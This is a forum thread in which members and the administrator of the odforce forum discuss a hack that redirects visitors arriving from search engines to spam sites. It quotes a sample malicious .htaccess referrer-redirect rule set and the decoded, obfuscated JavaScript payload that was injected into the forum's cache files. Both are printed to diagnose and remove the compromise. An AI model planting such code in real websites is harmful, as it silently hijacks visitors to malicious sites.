odforce still redirecting to spam sites?

[edward]

Is just me or does it seem that odforce is still redirecting to spam sites when coming from say google? Here's what just happened to me:

1. Sign out of odforce

2. Google for "edward odforce".

3. Click on the first link which is supposed to be some odforce forum thread. Redirection to spam site occurs.

I tried reproducing it immediately to no avail though. Maybe it once my IP is registered, it doesn't do any redirection until my IP has timed out.

[sam.h]

Happens to me to, usually the first one of the day.

[itriix]

yes happens to me too. just one time. assuming like you said, once it logs your ip, it will not redirect anymore to there.

stupid spam has their grips on everything now

[Marc]

Yip, sorry guys. It's a bunch of code that's been put into one of the files of the forum and I'm still trying to track down the source of it. Basically it resides in one of the cache files, so everytime the cache gets regenerated then the dodgy code gets put back in.

The reason it only happens once is because it writes a cookie saying that you've gone there already. And it only happens if you come from google (or one of the other search engines).

So I know exactly what it is and how it works I just can't find where the darn thing comes from. I'll get it one day (hopefully).

Cheers

Marc

[geo]

Hi Everyone, it occured to me also many times...

@Marc :

I don't know if you've done it already but i would first of all check out my .htacess file

following is a sample code that make your site redirect when called via a search engine

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]

RewriteRule .* http://somethingsomething.xom/in.html?s=ipw2 [R,L]

When typing the URL into the address bar of the browser, the "referer" is no longer Google, or any of the other search engines so the redirect does not occur.

it may be more complex than that, but if it was me i would begin by here.

Hope that helps

Cheers

Georges

Edited November 16, 2009 by geo

[Marc]

yeah it's a similar thing (sort of ). There is a base_64 encoded script in my language cache file. And when it evaluates it checks the referrer and redirects to that site if you come from a search engine. It's definitely an IPB thing and very specific to this version, and although they think we've been hacked there isn't any evidence of it anywhere. I suspect that version 3.0 had a vulnerability which was subsequently patched, unfortunately we got hit before that and there's still some dodgy code in the forum somewhere.

I'll be digging again tonight to see if I can find it.... sigh

[goldleaf]

Hi Marc, just wanted to chime in and let you know that google results still jump to spam sites. Thanks for keeping odforce running!

[Marc]

ok thanks, I'll apply the temp fix again..and you're welcome

[Marc]

Hey, just an update for anyone who cares (and anyone finding this thread through google).

It seems as if vbulletin boards are also being hacked with the same symptoms. Ours seems to have changed where the base_64 code now decodes to something that looks like this :

var ipbs = 'e28e9daa';
eval(function (p, a, c, k, e, d) {
    e = function (c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function (e) {
            return d[e]
        }];
        e = function () {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('i a=["\\r\\d\\c\\k\\b\\y\\d","\\m\\d\\c\\k\\b\\y\\d","\\x\\z\\d\\M\\g\\b\\l\\d\\m\\j","\\c\\e\\K\\I\\k\\D\\c\\l\\b\\n\\r","\\v\\e\\e\\F\\b\\d","\\j","\\x\\z\\g\\w\\c\\p\\j\\f","\\b\\g\\C\\m","\\t","\\q\\e\\v\\w\\c\\b\\e\\n","\\p\\c\\c\\g\\E\\f\\f\\G\\l\\q\\t\\S\\H\\P\\b\\n\\R\\e\\f"];O s(A,o){i h=N J();h[a[1]](h[a[0]]()+L);i u=a[2]+h[a[3]]();B[a[4]]=A+a[5]+o+u+a[6]};s(a[7],a[8]);B[a[9]]=a[T]+Q;', 56, 56, '||||||||||_0x12bb|x69|x74|x65|x6F|x2F|x70|_0x102ex4|var|x3D|x54|x72|x73|x6E|_0x102ex3|x68|x6C|x67|ipbcc|x31|_0x102ex5|x63|x61|x3B|x6D|x20|_0x102ex2|document|x62|x53|x3A|x6B|x75|x33|x4D|Date|x47|86400000|x78|new|function|x2E|ipbs|x66|x32|10'.split('|'), 0, {}))

However I've found ones with var=vbsp, which means it's an exploit that affects both. So the good news is that it's bothering more people now, the bad news is that nobody seems to know how the exploit gets in and/or modifies the code. Hopefully someone will find it soon though, otherwise I'm going to be putting in a cron job to clean up the cache file (sigh... ).

Cheers

Marc

[Marc]

Hey everyone

So after fixing the problem for just under a year, it seems like the hack is back. I'm probably going to have to upgrade to the latest version of the forum to see if that solves the problem.

I'll keep you updated as to when that might happen.

Thanks

Marc

[edward]

Although I have always assumed this but I'll ask anyhow. This has always meant that our usernames/passwords have been long compromised?

[Matt_K]

Hey Marc!

It appears that there are many exploits available to hack IP Board! One particular being a hack of the 'se_redirect.php' file - do you see anything suspicious in there?

I will have a deeper look through the many search results tonight and see if I can find anything relating to the issue on od[force].

Later!

Matt.

[Marc]

Although I have always assumed this but I'll ask anyhow. This has always meant that our usernames/passwords have been long compromised?

Hey Ed

I don't think so. From what I can tell it's a vulnerability in the forum where some code gets injected into the cache files. So the way it works is that if you come here via one of the search engines it detects that and redirects you to the stupid url123.info site. What it then does is write a cookie with a value of 1 that expires in 24 hours. This cookie just tells the script to only send you there once every 24 hours.

As far as I can tell the db hasn't been accessed in any way at all, although to be fair I haven't found the source of the problem (like how the code is being injected into the cache files)... so anything is possible.

@Matt: I've been trolling the script kiddy places to see if I can find the script that does it, but I can't seem to track it down. If you find anything please email me. I'll check out the redirect file tonight.

Thanks

Marc

[Marc]

Hey all

I've fixed this for now. The code was put in a new cache file, which makes me suspect a vulnerability in this version of the forums' caching mechanism. I'll be trying to squeeze some time in to upgrade to the latest version soon.

Cheers

Marc